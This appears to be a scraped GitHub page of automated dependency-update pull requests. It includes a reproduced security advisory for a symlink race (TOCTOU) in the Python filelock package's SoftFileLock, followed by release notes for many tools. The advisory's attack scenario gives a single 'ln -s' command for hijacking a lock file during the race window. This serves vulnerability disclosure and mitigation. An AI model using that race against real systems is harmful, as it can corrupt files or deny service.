`O_NOFOLLOW` flag is added conditionally and gracefully degrades on platforms without support - On platforms with `O_NOFOLLOW` support (most modern systems): symlink attacks are completely prevented - On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window remains but is documented **Users should:** - Upgrade to the patched version when available - For critical deployments, consider using `UnixFileLock` or `WindowsFileLock` instead of the fallback `SoftFileLock` --- ##### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ For users unable to update immediately: 1. **Avoid `SoftFileLock` in security-sensitive contexts** - use `UnixFileLock` or `WindowsFileLock` when available (these were already patched for CVE-2025-68146) 2. **Restrict filesystem permissions** - prevent untrusted users from creating symlinks in lock file directories: ```bash chmod 700 /path/to/lock/directory ``` 3. **Use process isolation** - isolate untrusted code from lock file paths to prevent symlink creation 4. **Monitor lock operations** - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations --- ##### References _Are there any links users can visit to find out more?_ - **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock) - **CWE-362 (Concurrent Execution using Shared Resource):** https://cwe.mitre.org/data/definitions/362.html - **CWE-367 (Time-of-check Time-of-use Race Condition):** https://cwe.mitre.org/data/definitions/367.html - **CWE-59 (Improper Link Resolution Before File Access):** https://cwe.mitre.org/data/definitions/59.html - **O_NOFOLLOW documentation:** https://man7.org/linux/man-pages/man2/open.2.html - **GitHub Repository:** https://github.com/tox-dev/filelock --- **Reported by:** George Tsigourakos (@​tsigouris007) #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H` #### References - [https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw) - [https://nvd.nist.gov/vuln/detail/CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) - [https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0](https://redirect.github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0) - [https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5](https://redirect.github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5) - [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-qmgc-5h2g-mvrw) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock [CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) / [GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw) / PYSEC-2026-1374 <details> <summary>More information</summary> #### Details ##### Vulnerability Summary **Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock **Affected Component:** `filelock` package - `SoftFileLock` class **File:** `src/filelock/_soft.py` lines 17-27 **CWE:** CWE-362, CWE-367, CWE-59 --- ##### Description A TOCTOU race condition vulnerability exists in the `SoftFileLock` implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly. The vulnerability occurs in the `_acquire()` method between `raise_on_not_writable_file()` (permission check) and `os.open()` (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service. ##### Attack Scenario ``` 1. Lock attempts to acquire on /tmp/app.lock 2. Permission validation passes 3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock 4. os.open() tries to create lock file 5. Lock operates on attacker-controlled target file or fails ``` --- ##### Impact _What kind of vulnerability is it? Who is impacted?_ This is a **Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability** affecting any application using `SoftFileLock` for inter-process synchronization. **Affected Users:** - Applications using `filelock.SoftFileLock` directly - Applications using the fallback `FileLock` on systems without `fcntl` support (e.g., GraalPy) **Consequences:** - **Silent lock acquisition failure** - applications may not detect that exclusive resource access is not guaranteed - **Denial of Service** - attacker can prevent lock file creation by maintaining symlink - **Resource serialization failures** - multiple processes may acquire "locks" simultaneously - **Unintended file operations** - lock could operate on attacker-controlled files **CVSS v4.0 Score:** 5.6 (Medium) **Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N **Attack Requirements:** - Local filesystem access to the directory containing lock files - Permission to create symlinks (standard for regular unprivileged users on Unix/Linux) - Ability to time the symlink creation during the narrow race window --- ##### Patches _Has the problem been patched? What versions should users upgrade to?_ Yes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag to prevent symlink following during lock file creation. **Patched Version:** Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0) **Mitigation Details:** - The `O_NOFOLLOW` flag is added conditionally and gracefully degrades on platforms without support - On platforms with `O_NOFOLLOW` support (most modern systems): symlink attacks are completely prevented - On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window remains but is documented **Users should:** - Upgrade to the patched version when available - For critical deployments, consider using `UnixFileLock` or `WindowsFileLock` instead of the fallback `SoftFileLock` --- ##### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ For users unable to update immediately: 1. **Avoid `SoftFileLock` in security-sensitive contexts** - use `UnixFileLock` or `WindowsFileLock` when available (these were already patched for CVE-2025-68146) 2. **Restrict filesystem permissions** - prevent untrusted users from creating symlinks in lock file directories: ```bash chmod 700 /path/to/lock/directory ``` 3. **Use process isolation** - isolate untrusted code from lock file paths to prevent symlink creation 4. **Monitor lock operations** - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations --- ##### References _Are there any links users can visit to find out more?_ - **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock) - **CWE-362 (Concurrent Execution using Shared Resource):** https://cwe.mitre.org/data/definitions/362.html - **CWE-367 (Time-of-check Time-of-use Race Condition):** https://cwe.mitre.org/data/definitions/367.html - **CWE-59 (Improper Link Resolution Before File Access):** https://cwe.mitre.org/data/definitions/59.html - **O_NOFOLLOW documentation:** https://man7.org/linux/man-pages/man2/open.2.html - **GitHub Repository:** https://github.com/tox-dev/filelock --- **Reported by:** George Tsigourakos (@​tsigouris007) #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H` #### References - [https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw) - [https://nvd.nist.gov/vuln/detail/CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) - [https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0](https://redirect.github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0) - [https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5](https://redirect.github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5) - [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock) - [https://pypi.org/project/filelock](https://pypi.org/project/filelock) - [https://github.com/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw) This data is provided by [OSV](https://osv.dev/vulnerability/PYSEC-2026-1374) and the [PyPI Advisory Database](https://redirect.github.com/pypa/advisory-database) ([CC-BY 4.0](https://redirect.github.com/pypa/advisory-database/blob/main/LICENSE)). </details> --- ### Release Notes <details> <summary>tox-dev/py-filelock (filelock)</summary> ### [`v3.30.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.30.0) [Compare Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.29.7...3.30.0) <!-- Release notes generated using configuration in .github/release.yaml at 3.30.0 --> #### What's Changed - 🎨 style: readability cleanup across the library by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#598](https://redirect.github.com/tox-dev/filelock/pull/598) - 🐛 fix(api): ignore lifetime on native OS locks by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#593](https://redirect.github.com/tox-dev/filelock/pull/593) - 🐛 fix(unix): don't mutate lock file before acquiring flock by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#594](https://redirect.github.com/tox-dev/filelock/pull/594) - soft: evict a non-regular lock file without reading it by [@​dxbjavid](https://redirect.github.com/dxbjavid) in [tox-dev/filelock#597](https://redirect.github.com/tox-dev/filelock/pull/597) - 🐛 fix(windows): bind reparse-point check to the locked handle by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#596](https://redirect.github.com/tox-dev/filelock/pull/596) - 🐛 fix(api): make native lock release transactional by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#615](https://redirect.github.com/tox-dev/filelock/pull/615) - 🐛 fix(soft): make marker writes and cleanup transactional by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#614](https://redirect.github.com/tox-dev/filelock/pull/614) - 🐛 fix(windows): open the lock file through NtCreateFile by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#617](https://redirect.github.com/tox-dev/filelock/pull/617) - ✨ feat(api): add context\_error\_policy for dual context failures by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#618](https://redirect.github.com/tox-dev/filelock/pull/618) - 📝 docs: correct Unix lock-file cleanup and flock claims by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#623](https://redirect.github.com/tox-dev/filelock/pull/623) - ✨ feat(api): add close\_error\_policy for post-unlock close errors by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#619](https://redirect.github.com/tox-dev/filelock/pull/619) - 🐛 fix(api): canonicalize singleton keys without following a final symlink by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#621](https://redirect.github.com/tox-dev/filelock/pull/621) - ✨ feat(unix): add fallback\_to\_soft opt-out for native locks by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#622](https://redirect.github.com/tox-dev/filelock/pull/622) - ✨ feat: add lock\_descriptor for a caller-owned descriptor by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#620](https://redirect.github.com/tox-dev/filelock/pull/620) - ✨ feat(api): add preserve\_lock\_file to keep the lock pathname by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#624](https://redirect.github.com/tox-dev/filelock/pull/624) - ✨ feat(api): add on\_acquired post-acquisition hook by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#625](https://redirect.github.com/tox-dev/filelock/pull/625) - 🔧 build(release): towncrier changelog pipeline, backfill, and docs by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#626](https://redirect.github.com/tox-dev/filelock/pull/626) - 📝 docs: drop bot entries and link code refs in the changelog by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#638](https://redirect.github.com/tox-dev/filelock/pull/638) - 🐛 fix(api): validate lifetime values by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#644](https://redirect.github.com/tox-dev/filelock/pull/644) - 🐛 fix(win32): capture process probe errors by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#645](https://redirect.github.com/tox-dev/filelock/pull/645) - 🐛 fix(api): reject dropped lock options by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#646](https://redirect.github.com/tox-dev/filelock/pull/646) - 🐛 fix(api): retain acquisition path identity by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#647](https://redirect.github.com/tox-dev/filelock/pull/647) - 🐛 fix(api): detach grouped release errors by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#648](https://redirect.github.com/tox-dev/filelock/pull/648) - 🐛 fix(descriptor): define unavailable behavior by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#650](https://redirect.github.com/tox-dev/filelock/pull/650) - 🐛 fix(ci): map absolute coverage paths by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#651](https://redirect.github.com/tox-dev/filelock/pull/651) - 🐛 fix(soft): relinquish fd before close by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#649](https://redirect.github.com/tox-dev/filelock/pull/649) - 🐛 fix(async): make cancellation atomic by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#652](https://redirect.github.com/tox-dev/filelock/pull/652) - 🐛 fix(sqlite): isolate forked connections by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#657](https://redirect.github.com/tox-dev/filelock/pull/657) - 🧪 test(conftest): scope the close mock to one descriptor by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#656](https://redirect.github.com/tox-dev/filelock/pull/656) - ✨ feat(soft): add strict soft locks and leases by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#658](https://redirect.github.com/tox-dev/filelock/pull/658) - ✨ feat(strict): replace shared markers with owner claims by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#659](https://redirect.github.com/tox-dev/filelock/pull/659) - 🐛 fix(soft): detect a reused PID via process start time by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#660](https://redirect.github.com/tox-dev/filelock/pull/660) - 🔒 fix(soft): fail safe on transient heartbeat errors by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#661](https://redirect.github.com/tox-dev/filelock/pull/661) - 📝 docs: state the lock trust boundaries once by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#663](https://redirect.github.com/tox-dev/filelock/pull/663) - 👷 ci(perf): add the performance and NFS matrix by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#664](https://redirect.github.com/tox-dev/filelock/pull/664) - Replace prettier with mdformat and yamlfmt by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#667](https://redirect.github.com/tox-dev/filelock/pull/667) - 👷 ci(matrix): add SMB, capability, and matrix docs by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#665](https://redirect.github.com/tox-dev/filelock/pull/665) **Full Changelog**: <tox-dev/filelock@3.29.7...3.30.0> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Enabled. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://redirect.github.com/renovatebot/renovate). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMjQuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIyNC4xIiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiLCJmaWxlbG9jayIsInJlbm92YXRlIl19--> Co-authored-by: renovate-coop-norge[bot] <151545514+renovate-coop-norge[bot]@users.noreply.github.com>
ansibuddy
added a commit
to ansible/molecule
that referenced
this pull request
Jul 30, 2026
> ℹ️ **Note**
>
> This PR body was truncated due to platform limits.
This PR contains the following updates:
| Package | Type | Update | Change | Pending |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|---|---|---|
| [actions/checkout](https://redirect.github.com/actions/checkout) |
action | major | `v6` → `v7` | `v7.0.1` |

|

|
|
[actions/setup-python](https://redirect.github.com/actions/setup-python)
| action | major | `v6` → `v7` | |

|

|
|
[ansible/ansible-lint](https://redirect.github.com/ansible/ansible-lint)
| repository | minor | `v26.4.0` → `v26.6.0` | |

|

|
|
[astral-sh/uv-pre-commit](https://redirect.github.com/astral-sh/uv-pre-commit)
| repository | patch | `0.11.19` → `0.11.32` | |

|

|
| [biomejs/pre-commit](https://redirect.github.com/biomejs/pre-commit) |
repository | minor | `v2.4.16` → `v2.5.5` | |

|

|
| [codespell](https://redirect.github.com/codespell-project/codespell) |
dependency-groups | patch | `2.4.2` → `2.4.3` | |

|

|
| [coverage](https://redirect.github.com/coveragepy/coveragepy) |
dependency-groups | patch | `7.15.1` → `7.15.2` | |

|

|
| [filelock](https://redirect.github.com/tox-dev/py-filelock) |
dependency-groups | minor | `3.29.7` → `3.32.0` | |

|

|
| [jsh9/pydoclint](https://redirect.github.com/jsh9/pydoclint) |
repository | minor | `0.8.6` → `0.9.1` | |

|

|
| [pipx](https://redirect.github.com/pypa/pipx)
([changelog](https://pipx.pypa.io/latest/changelog/)) |
dependency-groups | minor | `1.15.0` → `1.16.2` | `1.16.3` |

|

|
| [prek](https://prek.j178.dev/)
([source](https://redirect.github.com/j178/prek),
[changelog](https://redirect.github.com/j178/prek/blob/master/CHANGELOG.md))
| dependency-groups | patch | `0.4.9` → `0.4.11` | |

|

|
| [pycqa/pylint](https://redirect.github.com/pycqa/pylint) | repository
| patch | `v4.0.5` → `v4.0.6` | |

|

|
| [ruff](https://docs.astral.sh/ruff)
([source](https://redirect.github.com/astral-sh/ruff),
[changelog](https://redirect.github.com/astral-sh/ruff/blob/main/CHANGELOG.md))
| dependency-groups | minor | `0.15.21` → `0.16.0` | |

|

|
| [tombi](https://redirect.github.com/tombi-toml/tombi) |
dependency-groups | patch | `1.2.0` → `1.2.4` | |

|

|
| [tox](https://redirect.github.com/tox-dev/tox)
([changelog](https://tox.wiki/en/latest/changelog.html)) |
dependency-groups | minor | `4.56.4` → `4.58.0` | |

|

|
| [tox-ansible](https://redirect.github.com/ansible/tox-ansible)
([changelog](https://redirect.github.com/ansible/tox-ansible/releases))
| dependency-groups | patch | `26.7.0` → `26.7.1` | |

|

|
| [tox-uv](https://redirect.github.com/tox-dev/tox-uv#tox-uv)
([changelog](https://redirect.github.com/tox-dev/tox-uv/releases)) |
dependency-groups | minor | `1.35.2` → `1.36.0` | |

|

|
| [types-pyyaml](https://redirect.github.com/python/typeshed)
([changelog](https://redirect.github.com/typeshed-internal/stub_uploader/blob/main/data/changelogs/PyYAML.md))
| dependency-groups | patch | `6.0.12.20260518` → `6.0.12.20260724` | |

|

|
Note: The `pre-commit` manager in Renovate is not supported by the
`pre-commit` maintainers or community. Please do not report any problems
there, instead [create a Discussion in the Renovate
repository](https://redirect.github.com/renovatebot/renovate/discussions/new)
if you have any questions.
---
### Release Notes
<details>
<summary>actions/checkout (actions/checkout)</summary>
###
[`v7.0.0`](https://redirect.github.com/actions/checkout/blob/HEAD/CHANGELOG.md#v700)
[Compare
Source](https://redirect.github.com/actions/checkout/compare/v7.0.0...v7.0.0)
- Block checking out fork PR for pull\_request\_target and workflow\_run
by [@​aiqiaoy](https://redirect.github.com/aiqiaoy) in
[#​2454](https://redirect.github.com/actions/checkout/pull/2454)
- Bump actions/publish-immutable-action from 0.0.3 to 0.0.4 in the
minor-actions-dependencies group across 1 directory by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​2458](https://redirect.github.com/actions/checkout/pull/2458)
- Bump flatted from 3.3.1 to 3.4.2 by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​2460](https://redirect.github.com/actions/checkout/pull/2460)
- Bump js-yaml from 4.1.0 to 4.2.0 by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​2461](https://redirect.github.com/actions/checkout/pull/2461)
- Bump [@​actions/core](https://redirect.github.com/actions/core)
and
[@​actions/tool-cache](https://redirect.github.com/actions/tool-cache)
and Remove uuid by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​2459](https://redirect.github.com/actions/checkout/pull/2459)
- upgrade module to esm and update dependencies by
[@​aiqiaoy](https://redirect.github.com/aiqiaoy) in
[#​2463](https://redirect.github.com/actions/checkout/pull/2463)
- Bump the minor-npm-dependencies group across 1 directory with 3
updates by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​2462](https://redirect.github.com/actions/checkout/pull/2462)
###
[`v7`](https://redirect.github.com/actions/checkout/blob/HEAD/CHANGELOG.md#v700)
[Compare
Source](https://redirect.github.com/actions/checkout/compare/v6.1.0...v7.0.0)
- Block checking out fork PR for pull\_request\_target and workflow\_run
by [@​aiqiaoy](https://redirect.github.com/aiqiaoy) in
[#​2454](https://redirect.github.com/actions/checkout/pull/2454)
- Bump actions/publish-immutable-action from 0.0.3 to 0.0.4 in the
minor-actions-dependencies group across 1 directory by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​2458](https://redirect.github.com/actions/checkout/pull/2458)
- Bump flatted from 3.3.1 to 3.4.2 by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​2460](https://redirect.github.com/actions/checkout/pull/2460)
- Bump js-yaml from 4.1.0 to 4.2.0 by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​2461](https://redirect.github.com/actions/checkout/pull/2461)
- Bump [@​actions/core](https://redirect.github.com/actions/core)
and
[@​actions/tool-cache](https://redirect.github.com/actions/tool-cache)
and Remove uuid by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​2459](https://redirect.github.com/actions/checkout/pull/2459)
- upgrade module to esm and update dependencies by
[@​aiqiaoy](https://redirect.github.com/aiqiaoy) in
[#​2463](https://redirect.github.com/actions/checkout/pull/2463)
- Bump the minor-npm-dependencies group across 1 directory with 3
updates by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​2462](https://redirect.github.com/actions/checkout/pull/2462)
</details>
<details>
<summary>actions/setup-python (actions/setup-python)</summary>
###
[`v7.0.0`](https://redirect.github.com/actions/setup-python/compare/v6.3.0...v7.0.0)
[Compare
Source](https://redirect.github.com/actions/setup-python/compare/v7.0.0...v7.0.0)
###
[`v7`](https://redirect.github.com/actions/setup-python/compare/v6.3.0...v7.0.0)
[Compare
Source](https://redirect.github.com/actions/setup-python/compare/v6.3.0...v7.0.0)
</details>
<details>
<summary>ansible/ansible-lint (ansible/ansible-lint)</summary>
###
[`v26.6.0`](https://redirect.github.com/ansible/ansible-lint/releases/tag/v26.6.0)
[Compare
Source](https://redirect.github.com/ansible/ansible-lint/compare/v26.4.0...v26.6.0)
##### Features
- fix: ensure configuration errors are visible to user
([#​5038](https://redirect.github.com/ansible/ansible-lint/issues/5038))
[@​Dotify71](https://redirect.github.com/Dotify71)
##### Fixes
- fix: bump cryptography minimum to >=46.0.6 and refresh lock file
([#​5089](https://redirect.github.com/ansible/ansible-lint/issues/5089))
[@​sudhirverma](https://redirect.github.com/sudhirverma)
- fix: added setup-uv action version pinning to renovate config
([#​5021](https://redirect.github.com/ansible/ansible-lint/issues/5021))
[@​garethahealy](https://redirect.github.com/garethahealy)
- fix: detect role roots in namespace subdirectories
([#​5079](https://redirect.github.com/ansible/ansible-lint/issues/5079))
([#​5080](https://redirect.github.com/ansible/ansible-lint/issues/5080))
[@​santosh7676](https://redirect.github.com/santosh7676)
- fix(docs): remove mkdocstrings plugin to unblock docs CI
([#​5084](https://redirect.github.com/ansible/ansible-lint/issues/5084))
[@​rockygeekz](https://redirect.github.com/rockygeekz)
- fix: suppress ruff PLW0717 to unblock renovate
([#​5077](https://redirect.github.com/ansible/ansible-lint/issues/5077))
[@​rockygeekz](https://redirect.github.com/rockygeekz)
- Fix risky-shell-pipe false positive on multi-line Jinja
([#​5058](https://redirect.github.com/ansible/ansible-lint/issues/5058))
[@​arpitjain099](https://redirect.github.com/arpitjain099)
- Fix: fix mock\_modules generated stubs failing YAML/doc parsing
[#​5031](https://redirect.github.com/ansible/ansible-lint/issues/5031)
([#​5032](https://redirect.github.com/ansible/ansible-lint/issues/5032))
[@​santosh7676](https://redirect.github.com/santosh7676)
- fix: support example format indicator, prevent ansible-lint from
producing load-failure on valid non-YAML examples
([#​5045](https://redirect.github.com/ansible/ansible-lint/issues/5045))
[@​felixfontein](https://redirect.github.com/felixfontein)
- fix: avoid name\[casing] auto-fix crash on multi-segment prefixes
([#​5026](https://redirect.github.com/ansible/ansible-lint/issues/5026))
[@​bishalOps](https://redirect.github.com/bishalOps)
- fix: preserve multi-hash comments on `ansible-lint --fix`
([#​5033](https://redirect.github.com/ansible/ansible-lint/issues/5033))
[@​bishalOps](https://redirect.github.com/bishalOps)
- fix: preserve trailing blank lines when fqcn auto-fix renames a key
([#​5027](https://redirect.github.com/ansible/ansible-lint/issues/5027))
[@​bishalOps](https://redirect.github.com/bishalOps)
- fix(security): update dependencies \[SECURITY]
([#​5061](https://redirect.github.com/ansible/ansible-lint/issues/5061))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- fix(ci): switch devel tests from py312 to py313
([#​5062](https://redirect.github.com/ansible/ansible-lint/issues/5062))
[@​rockygeekz](https://redirect.github.com/rockygeekz)
- fix: ignore skip lookup across rules
([#​5060](https://redirect.github.com/ansible/ansible-lint/issues/5060))
[@​mehrdadbn9](https://redirect.github.com/mehrdadbn9)
- chore: Add support for Fedora 44 in the meta schema
([#​5029](https://redirect.github.com/ansible/ansible-lint/issues/5029))
[@​jsf9k](https://redirect.github.com/jsf9k)
- fix: ensure configuration errors are visible to user
([#​5038](https://redirect.github.com/ansible/ansible-lint/issues/5038))
[@​Dotify71](https://redirect.github.com/Dotify71)
- fix: role argument spec: fix typo in attribute schema
([#​5044](https://redirect.github.com/ansible/ansible-lint/issues/5044))
[@​felixfontein](https://redirect.github.com/felixfontein)
- fix: handle ignore.txt comments with '#' in them correctly
([#​5028](https://redirect.github.com/ansible/ansible-lint/issues/5028))
[@​felixfontein](https://redirect.github.com/felixfontein)
- fix: Evaluate the exit code after applying the skipped rules from
.ansible-lint-ignore
([#​5001](https://redirect.github.com/ansible/ansible-lint/issues/5001))
[@​gmuloc](https://redirect.github.com/gmuloc)
- fix: Update stale rulebook schema to match upstream ansible-rulebook
([#​5056](https://redirect.github.com/ansible/ansible-lint/issues/5056))
[@​Hrithik-Gavankar](https://redirect.github.com/Hrithik-Gavankar)
- fix: update \_extends syntax for release-drafter v7 compatibility
([#​5043](https://redirect.github.com/ansible/ansible-lint/issues/5043))
[@​rockygeekz](https://redirect.github.com/rockygeekz)
- fix(security): update dependencies \[SECURITY] - abandoned
([#​5014](https://redirect.github.com/ansible/ansible-lint/issues/5014))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- fix: update malformed block regex and bump pathspec upper bound
([#​5039](https://redirect.github.com/ansible/ansible-lint/issues/5039))
[@​rockygeekz](https://redirect.github.com/rockygeekz)
##### Maintenance
- chore: remove previously-synced agent skills
([#​5078](https://redirect.github.com/ansible/ansible-lint/issues/5078))
[@​ansibuddy](https://redirect.github.com/ansibuddy)
- chore(deps): update all dependencies
([#​5074](https://redirect.github.com/ansible/ansible-lint/issues/5074))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- fix(security): update dependencies \[SECURITY]
([#​5061](https://redirect.github.com/ansible/ansible-lint/issues/5061))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- test: add security-check workflow (integration test)
([#​5064](https://redirect.github.com/ansible/ansible-lint/issues/5064))
[@​cidrblock](https://redirect.github.com/cidrblock)
- chore: Add support for Fedora 44 in the meta schema
([#​5029](https://redirect.github.com/ansible/ansible-lint/issues/5029))
[@​jsf9k](https://redirect.github.com/jsf9k)
- chore: clarify yaml reformatting under fix
([#​5057](https://redirect.github.com/ansible/ansible-lint/issues/5057))
[@​Himanshuagrawal4](https://redirect.github.com/Himanshuagrawal4)
- chore(deps): update all dependencies pep621
([#​5047](https://redirect.github.com/ansible/ansible-lint/issues/5047))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​5046](https://redirect.github.com/ansible/ansible-lint/issues/5046))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies pep621
([#​5041](https://redirect.github.com/ansible/ansible-lint/issues/5041))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​5040](https://redirect.github.com/ansible/ansible-lint/issues/5040))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​5011](https://redirect.github.com/ansible/ansible-lint/issues/5011))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- fix(security): update dependencies \[SECURITY] - abandoned
([#​5014](https://redirect.github.com/ansible/ansible-lint/issues/5014))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies pep621
([#​5012](https://redirect.github.com/ansible/ansible-lint/issues/5012))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
</details>
<details>
<summary>astral-sh/uv-pre-commit (astral-sh/uv-pre-commit)</summary>
###
[`v0.11.32`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.32)
[Compare
